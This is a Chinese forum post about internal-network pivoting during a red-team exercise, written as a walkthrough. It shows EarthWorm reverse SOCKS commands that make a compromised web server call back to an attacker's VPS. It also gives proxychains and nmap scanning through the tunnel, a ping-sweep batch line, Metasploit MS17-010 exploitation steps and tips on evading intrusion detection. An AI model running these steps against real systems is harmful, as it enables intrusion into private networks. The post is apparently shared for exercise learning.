用户
搜索
  • TA的每日心情
    开心
    4 天前
  • 签到天数: 8 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋-脚本小子

    Rank: 2

    1

    主题

    8

    帖子

    161

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2019-4-17
    发表于 2020-7-22 20:42:03 167570
    本帖最后由 精通linux开关机 于 2020-7-22 21:12 编辑

    一、前言

    最近一周护网进行了内网渗透,这里做个人小结,也方便其他小伙伴学习EW。这里仅记录后渗透中与EW相关的部分,已提前在tomcat中留下冰蝎马。
    ew.png

    二、本文介绍

    1.准备工作
    2.EW是什么,可以做什么。
    3.内网模拟(基础环境及网络拓扑)
    4.EW代理实战
    6.利用proxychains代理寻找MS17-010。

    三、准备工作

    1.模拟环境需要natapp.cn这类NAT穿透工具,注册账号购买免费web映射套餐。
    2.EW内网穿透工具,https://github.com/idlefire/ew
    3.一台Ubuntu VPS,端口开放10000-65535
    4.若干台WINDOWS虚拟机在NAT网络下运行。

    四、EW简介

    EW是一款四年前开发好的NAT穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透代理服务,能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,帮助内网渗透直达网络深处。 工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内。

    EW共有 6 种命令格式(ssocksd正向、rcsocks反弹、rssocks反弹、lcx_slave级联 、lcx_listen级联 、lcx_tran级联 )。其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供,分别对应正向与反向socks代理,其余的 lcx 链路状态用于打通测试主机同 socks 服务器之间的通路。这里篇幅有限,仅介绍危害最大的rssocks。

    同类工具还有socat,就实战来看,EW操作较简单,SOCAT有时会发生段错误,而EW则比较稳定。

    防守方如需查杀规则查看 https://github.com/rootkiter/Binary-files 项目。

    五、内网模拟

    [backcolor=white]
    Kali Linux(Attacker 内网 172.16.33.129)

    Ubuntu 16.04.3(Attacker 公网 120.53.123.X)

    Windows 7(肉鸡 WEB服务器 172.2.40.129)

    Windows 7 SP1(肉鸡内网其他机器 172.2.40.X)[/backcolor]

    网络拓扑:Kali Linux是攻击者,Ubuntu是公网上的一台VPS,Windows 7是目标机器,无外网IP,8080端口通过NAT穿透工具映射到外网提供WEB服务。

    拓扑图

    拓扑图

    六、EW代理实战

    数据流向:  黑客KALI SOCKS v5 <-> VPS 10801 <-> VPS 10241 <-> 肉鸡 rssocks

    操作在 公网IP主机 和 WEB肉机上进行,目的是通过反弹方式创建socks代理。

    第一步,在VPS上将Github下回的 EW 项目解压并执行:

    ./ew_for_linux64 -s rcsocks -l 10801 -e 10241   

    这句话的意思是,在 120.53.123.X  VPS主机添加转换隧道,其中10801端口供黑客使用,10241 端口供肉鸡通道连接,黑客连接10801,本质是反连VPS的10241端口。

    VPS执行

    VPS执行

    第二步,在WEB主机(172.2.40.129)上执行:

    ew_for_Win.exe -s rssocks -d 120.53.123.X -e 10241

    这句话的意思是,在WEB肉鸡上开启socks5代理服务,具体端口依据VPS端设定,这里的10241仅与VPS通信使用。上传ew到选定的目录。

    肉鸡执行上

    肉鸡执行上
    肉鸡网络环境

    肉鸡执行中

    肉鸡执行中

    肉鸡内网其他机器

    肉鸡执行下

    肉鸡执行下

    工具使用第三步,在KALI上:vim /etc/proxychains.conf

    socks5  120.53.123.X 10241

    proxychains

    proxychains

    这里用SOCKS5,因为是WIN的主机,还有一个选择--弹到CS,CS代理为SOCKS4。

    注意验证SOCKS是否打通,

    proxychains nmap -sT hosts -p port

    验证打通socks

    验证打通socks

    七、内网探测

    proxy nmap targetIP

    慎用扫描,流量动静大、速度慢、不稳定、时间长、容易断 。

    NetBIOS、ICMP均可以探测存活主机,前者仅探测WIN,后者遇到禁ping摸瞎。

    还有ARP探测特征比较明显。三者权衡,因此进入陌生环境,首选ICMP。

    如果是Linux用bash脚本,如果是Win用bat脚本或上PS如Empire的arpscan模块、Nishang的Invoke-ARPScan.ps1。

    cmd命令可保存成bat后执行: for /l %%p in (1,1,254) do ping 172.2.40.%%p -n 1 -w 5 |find "TTL" >./ipcheck.log

    也可先执行,arp -a看缓存结果。

    注意Socks协议只能下到网络层,ICMP属于链路层无法代理。

    因此proxychains ping命令不能正常工作。

    发现可疑内网机器

    发现可疑内网机器

    验证内网WIN主机是否开启防火墙,

    内网存在445机器

    内网存在445机器

    八、MSF漏洞验证

    proxychains msfconsole

    search 17_010

    use 1

    set rhost 172.2.40.128

    exploit

    MSF探测

    MSF探测

    九、总结

    内网中有许多监控设备,有HIDS和NIDS, 其中规避HIDS需对工具免杀,规避NIDS需慎用扫描,避免踩雷。学习上,搭靶场多积累经验,了解安全设备检测原理避免被针对。







    评分

    参与人数 2魔法币 +6 收起 理由
    whoami2020 + 3 感谢发布原创作品,i春秋论坛因你更精彩!.
    种子选手 + 3

    查看全部评分


    我在春秋的ctf群里,喜欢帮忙点个赞哈。
    使用道具 举报 回复
    看过你以往的文章,期待大佬建群交流
    使用道具 举报 回复

    期待后续大佬更新哇,xuexile
    使用道具 举报 回复
    人间凑数的日子。大佬tql
    使用道具 举报 回复
    老哥,真强!希望多分享点!
    使用道具 举报 回复
    都太强了,我是个弱鸡唉……
    使用道具 举报 回复
    唉,起步难,想跟大佬
    使用道具 举报 回复
    发表于 2020-7-23 14:44:34
    师傅带带我吧
    使用道具 举报 回复
    发表于 2020-7-23 14:44:17
    膜一下
    使用道具 举报 回复
    发表于 2020-7-23 14:44:25
    老哥666
    使用道具 举报 回复
    发表于 2020-7-23 14:44:56
    老哥,有群吗?
    使用道具 举报 回复
    发表于 2020-7-23 16:01:50
    ddddhm……
    使用道具 举报 回复
    发表于 2020-7-23 16:22:06
    学习lllll
    使用道具 举报 回复
    发表于 2020-7-23 16:22:16
    大佬tql
    使用道具 举报 回复
    发表于 2020-7-23 17:11:02
    表哥666
    使用道具 举报 回复
    发表于 2020-7-23 18:14:25
    使用道具 举报 回复
    12下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册